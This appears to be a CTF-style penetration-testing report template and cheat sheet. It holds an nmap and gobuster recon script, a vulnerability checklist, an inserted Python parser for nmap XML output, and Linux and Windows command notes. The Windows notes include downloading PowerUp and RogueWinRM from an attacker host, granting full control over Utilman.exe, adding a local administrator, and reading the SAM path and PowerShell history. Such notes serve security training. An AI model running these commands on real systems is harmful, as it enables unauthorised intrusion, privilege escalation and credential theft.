# 0xFF Report (Template)

```
ATTACKER_INTERFACE="tun0"
TARGET_IP=10.10.165.130
ATTACKER_IP=$(ip addr show $ATTACKER_INTERFACE | awk '/inet / {print $2}' | cut -d '/' -f 1)
# Export so the scan script below (a separate process) can read them.
export TARGET_IP ATTACKER_IP
```

## Reconnaissance

**DNS Setting**

Domain Name Check

```bash
TARGET_DOMAIN='RetroWeb'
nslookup $TARGET_DOMAIN
```

```bash
TARGET_DOMAIN='RetroWeb'
echo "$TARGET_IP $TARGET_DOMAIN" >> /etc/hosts
```

### Nmap-Scanning

```sh
#!/bin/sh
# Expects TARGET_IP to be exported from the variables block above.
: "${TARGET_IP:?set and export TARGET_IP first}"
echo "
##################################################
#                                                #
#           MeowHecker is a cat. ^O^             #
#                                                #
##################################################
"
echo "HOST Discover"
# -PR (ARP ping) only has an effect on a directly attached LAN; -PS sends TCP SYN probes.
nmap -PR -PS -sn --reason -T4 "$TARGET_IP"
echo "----------------------------------------------------------------------------------------------------"
echo "Scanning Default Port"
# Keep only ports reported open; closed/filtered ports would otherwise end up in the list.
TARGET_OPEN_PORTS=$(nmap -sS -Pn -T4 "$TARGET_IP" | awk '/^ *[0-9]+\/(tcp|udp) +open/ {print $1}' | cut -d "/" -f 1 | paste -sd ",")
echo "Default (top 1000 ports): $TARGET_OPEN_PORTS"
echo "----------------------------------------------------------------------------------------------------"
if [ -n "$TARGET_OPEN_PORTS" ]; then
  echo "Identifying Services & Operating System & NSE Scanning"
  nmap -sT -Pn -p "$TARGET_OPEN_PORTS" -sV -O -sC -T4 "$TARGET_IP" -oX "./$TARGET_IP.Xmap"
  #searchsploit --name $TARGET_IP.Xmap
  echo "----------------------------------------------------------------------------------------------------"
  searchsploit --nmap "$TARGET_IP.Xmap"
  sleep 10
fi
echo "Starting Scanning 1024-10000"
nmap -sS -p1024-10000 -T4 "$TARGET_IP"
sleep 1
echo "Starting 10000~65535 Port Scanning in background"
# A background job ends with '&' alone; '&;' is a syntax error in sh.
nmap -sS -Pn -p10000-65535 -T4 "$TARGET_IP" -oN "PortScan0~65535$TARGET_IP.nmap" &
```

**Identifying Services & Operating System & NSE Scanning**

**Port Scanning (10000~65535)**

## Discovery & Analyzing Attack Surface

### Web

#### Enumeration - Directory

HTTP Website

```bash
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$TARGET_IP -t 100
```

HTTPS Website (`-k` skips TLS certificate verification)

```bash
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://$TARGET_IP -t 100 -k
```

#### Enumeration - Sub Domain

```bash
gobuster vhost -u http://$TARGET_DOMAIN -w /home/kali/Desktop/RedTools/wordlist/subdomains-top1million-5000.txt --append-domain -t 50 | grep Found | awk '{print $2}' > "$TARGET_DOMAIN-subDomain.txt"
if [ -s "$TARGET_DOMAIN-subDomain.txt" ]; then
  echo "Found Target subdomain"
  # Prefix every discovered vhost with the target IP so the file can be appended to /etc/hosts.
  sed -i "s/^/$TARGET_IP /" "$TARGET_DOMAIN-subDomain.txt"
  cat "$TARGET_DOMAIN-subDomain.txt" >> /etc/hosts
  echo "SubDomain added to /etc/hosts file."
else
  echo "No subdomains found."
fi
```

**Interesting things**

- Check 127.0.0.1
- Odd name?
- User Credential?
- Login page?
- Register page?
- Upload page?
- Forgot Password?

Site Map:

Functionalities:

#### Web Techniques

Language: ?

Application Name & Version: ?

CMS Scan?

#### Exists Known Vulnerabilities?

Check: Google? Exploit-DB? GitHub?

### Network Services

- Port:

#### Enumeration

Name & Version:

#### Exists Public Exploit?

## Identifying WebSite Vulnerabilities

### SiteMap & Dynamic Parameters

### Testing

**Checks**

- SQLi?
- Local or Remote file include?
- File Upload?
- Hidden Parameters?
- SSTI?
- API?
- XXE?
- SSRF?
- Website writable by a network service? (NFS/SMB)

### Flawed Design

### Confirm Defense Mechanisms

### Bypass Defense Mechanisms

- Bypass
  1. Newline?
  2. Path Traversal?
  3. Obfuscate?
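The Nmap script in the Reconnaissance section above writes its service scan to `./$TARGET_IP.Xmap` (`-oX`) and builds `TARGET_OPEN_PORTS` by scraping nmap's text output with awk. As an added example that is not part of the original note, the Python below reads that XML report instead (stable across nmap versions) and returns both the open-port list and the per-port product/version strings that searchsploit works from; the embedded XML is a constructed, trimmed sample, not real scan output.

```python
"""Parse the XML that `nmap -oX` writes into a list of open ports."""
import xml.etree.ElementTree as ET

# Constructed sample of `nmap -sV -oX ./$TARGET_IP.Xmap` output, cut down to the
# elements this parser reads; host, products and versions are made up.
SAMPLE_XML = """<nmaprun scanner="nmap">
  <host>
    <address addr="10.10.165.130" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.6p1"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http" product="Apache httpd" version="2.4.29"/>
      </port>
      <port protocol="tcp" portid="443">
        <state state="closed"/>
      </port>
    </ports>
  </host>
</nmaprun>"""


def open_ports(xml_text):
    """Return a dict per open port: host, proto, port, service, product, version."""
    found = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address").get("addr")  # first <address> is the IPv4 one
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue  # closed/filtered ports carry no usable fingerprint
            svc = port.find("service")
            attrs = svc.attrib if svc is not None else {}  # unfingerprinted ports may lack it
            found.append({"host": addr, "proto": port.get("protocol"),
                          "port": int(port.get("portid")),
                          "service": attrs.get("name", ""),
                          "product": attrs.get("product", ""),
                          "version": attrs.get("version", "")})
    return found


def port_list(xml_text):
    """Comma-joined open ports: the string the script's awk pipeline stores in
    TARGET_OPEN_PORTS for the follow-up `nmap -p` run."""
    return ",".join(str(p["port"]) for p in open_ports(xml_text))
```

Run `open_ports(open("10.10.165.130.Xmap").read())` against a real report to get the same table, or `port_list(...)` to feed the next `nmap -p`.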
## Exploitation

### Research & Vulnerabilities Chains

### Reverse Shell

## Post-Exploitation

**Shell Stabilization**

### Privilege Escalation

#### Enumeration

#### Exploit

---

# [Active Recon](/jZSjYlEESIWbdjKtVTfDAg)

# [Web penetration](/HeqpRWIdTiuZ0IzLr2oDlA)

# [Network Service penetration](/FyQUFaZYRKyLSwYhTAvALg)

# [Remote Brute Force Login](/ngZz3rf5QMyfW_8cIGJHKw)

# [Password/HASH/Encoder](/y7G9q6TBRmCujlS92M8VTQ)

# [Lateral Movement & Reverse Shell](/vyVONxxDSS-v8IQf5NLLwA)

# [Linux Privilege Escalation - cheat Sheet](/bacm0UUcSQa-wD1Yw-J9MA)

# [Windows Privilege Escalation - cheat Sheet](/F1Ec_YkdTo20hkQYnjRSAw)

# [Active Directory - Cheat Sheet](/dyb7O0UFTW6tVtIubN8YVw)

# [Metasploit - Cheat Sheet](/DLNUVZmGQ02itjSd3AUppQ)

# Linux Command

## $PATH ENV

```
echo $PATH | tr ':' '\n'
```

```
export PATH=/tmp:$PATH
```

## Search

### Specific file

```
find / -name flag1.txt 2>/dev/null
```

find / -name flag2.txt

### Writable Folder

```
find / -writable 2>/dev/null | cut -d "/" -f 2 | sort -u
```

```
find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep SPECIFIC_FOLDER | sort -u
```

find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep home | sort -u

## Download files

```
wget $ATTACKER_IP/BINARY -O /tmp/BINARY
```

## Network Cmd

Display socket information

```
ss -tulpn
```

## Temporary WebServer

```
sudo python3 -m http.server 80
```

## File Transmission

```
scp FILE_A VICTIM_USER@VICTIM_IP:/tmp
```

## Obtain User List

```
cat /etc/passwd | cut -d ":" -f 1
```

Works; filters out system accounts (keeps only users with a home directory under /home):

```
cat /etc/passwd | grep home | cut -d ":" -f 1
```

# Customized tools

## Compare Output with wordlist

https://github.com/Meowheckerrr/LinuxPrivilege/blob/main/Danger%20Binary%20Permission/Compare.py

# Windows Command

## System information

```
systeminfo
```

## Important Path

### USER Desktop

```
cd C:/Users/<USER_NAME>/Desktop
```

cd C:/Users/Administrator/Desktop

### SAM Path

```
cd C:\Windows\System32\config
```

## Search files

CMD (the filter is single-quoted so the nested quotes survive cmd.exe)

```
powershell -c "Get-ChildItem -Path C:\ -Filter 'flag*' -Recurse -ErrorAction SilentlyContinue"
```

Powershell

```
Get-ChildItem -Path C:\ -Filter "flag*" -Recurse -ErrorAction SilentlyContinue
```

Works; `-ErrorAction SilentlyContinue` suppresses the error messages.

## Windows Temp dir (R/W)

cmd.exe

```
cd C:\WINDOWS\Temp
```

## Listing Installed software /name/version/vendor

```
wmic product get name,version,vendor
```

Notice: the `wmic product` command may not return all installed programs (it might take around a minute to finish).

## Service

### Listing ALL services

cmd (note the space after `state=`; `sc` requires it)

```
sc query state= all
```

powershell

```
Get-Service
```

### Start/Stop the service

cmd.exe / Powershell

```
sc.exe stop SERVICE_NAME
sc.exe start SERVICE_NAME
```

sc.exe stop windowsscheduler

sc.exe start windowsscheduler

### Checking Service status & Name

cmd

```
powershell -c "Get-Service -Name WinRM"
```

Powershell

```
Get-Service -Name SERVICE_NAME
```

Get-Service -Name WinRM

### Checking service permission

Tools Download: https://download.sysinternals.com/files/AccessChk.zip

On the first run of this program we have to add the `-accepteula` option.

```
accesschk64.exe -qlc SERVICE_NAME -accepteula
```

### Checking Service configuration

Powershell -> Must use sc.exe to query!
cmd.exe

```
sc query state= all
sc qc SERVICE_NAME
```

## Print File content

cmd.exe

```
type FILE_PATH
```

## Scheduled Task

cmd.exe

```
schtasks
schtasks /query /tn TASK_NAME /fo list /v
```

```
schtasks /run /tn TASK_NAME
```

## Binary Permission

### Check Binary Permission

cmd.exe

```
icacls FILE_PATH
```

icacls C:\Windows\System32\Utilman.exe

icacls c:\windows\system32\inetsrv\

### Modify Binary Permission

```
icacls C:\PATH\TO\BINARY.exe /grant USER_NAME:F
```

icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F

## Powershell History

cmd.exe

```
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
```

Powershell

```
type $Env:userprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
```

## Add New user & add User into ADMIN group

cmd.exe

```
net user USER_NAME USER_PASS /add
net localgroup administrators USER_NAME /add
```

## Download files

cmd (`wget` is a PowerShell alias for Invoke-WebRequest, so the output path needs `-OutFile`)

```
powershell -c "wget http://10.4.42.63:8000/RogueWinRM.exe -OutFile ./RogueWinRM.exe"
```

Powershell (Great)

```
Invoke-WebRequest -Uri http://MACHINE-IP/BINARY_FILE.exe -OutFile C:\Windows\Temp\BINARY_FILE.exe
```

Powershell (old)

```
powershell "(New-Object System.Net.WebClient).DownloadFile('http://ATTACKER:53/PowerUp.ps1','PowerUp.ps1')"
```

powershell "(New-Object System.Net.WebClient).DownloadFile('http://10.4.42.63:53/PowerUp.ps1','PowerUp.ps1')"

Powershell (Normal)

```
wget http://<OUR_MACHINE-IP>/BINARY -O .\BINARY
```

wget http://10.4.42.63/RogueWinRM.exe -O ./RogueWinRM.exe

If that doesn't work, try Invoke-WebRequest.

# Public Exploit DB

packetstorm https://packetstormsecurity.com/search/?q=exploit

exploit-db https://www.exploit-db.com/

Rapid7 https://www.rapid7.com/db/

GitHub https://github.com/search?q=POC&ref=simplesearch

NVD https://nvd.nist.gov/vuln/full-listing

OSINT

https://haveibeenpwned.com/

https://www.dehashed.com/

https://search.censys.io/

<!--
Enumerate
[Nmap](/IQ0X0dEjQb2MlYNWltGiyQ)

Check permission
[AccessChk](/eG8iTjXCRimYh0Hh1UEcxQ)

Vulnerability scanner
[Nessus](/g7wmgc2HSeaLxr7CjtMu-g)

PWN
[spike](/vbjUdZ9uSA2mEdCCgLQCiw)
[mona](/4foU8SD3R661QFbsRx9dPQ)

web
[dirb](/WXEOmjh3TLeB5-5-H8woNQ)
[Gobuster](/vG5G0iawSNC6lcXunlkTwA)
[Burp suite](/OG8mjGXHSqO322yVFchh_A)
[curl](/-0FzNAw3SuqKTExRcKpLZA)
[sqlmap](/xFicQsJkQOK6dv2uvLycIQ)
[msfvenom](/ByWq5dNSQe6T_wHkTutV-g)
[Metasploit](/ZW0_1qSTSJ2dCxA-XtAZmw)

USB
[Hak5](/jIA0ERyJRDKX9vJwKlq4XQ)

MITM (Man in the middle attack)
>[responder](/Uq2Bd8I3THKo7TzgEOOSiQ) LLMNR, NBT-NS and MDNS poisoner; HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2

Capture packet
[tcpdump](/kfifQDlrRCCKhDLpB47RbQ)
[wireshark](/eIhUKz8GQhq14lgoJJv1Xg)

Decryption (local)
[john](/kt8t2zU4Shqc9OUVZywoIw)
[Hashcat](/1_bS2IjFSmuMbhWA98szbA)

(Remote) Service password Crack

McAfee
McAfee is Anti-virus software
Decryption -> ma.db (configuration file) -> Agent_repository -> Password

Tools Develop
[netcat](/cf6LLDnNRCGAF9C9rdgnRw)

[Cheat sheet (web links)](/QNXBbZJgSImS28EKbjs5Sw)
-->

Reference

- https://book.hacktricks.xyz/network-services-pentesting/pentesting-web#web-tech-tricks

```
Owner:侯智晟 meowheckerouo@gmail.com
```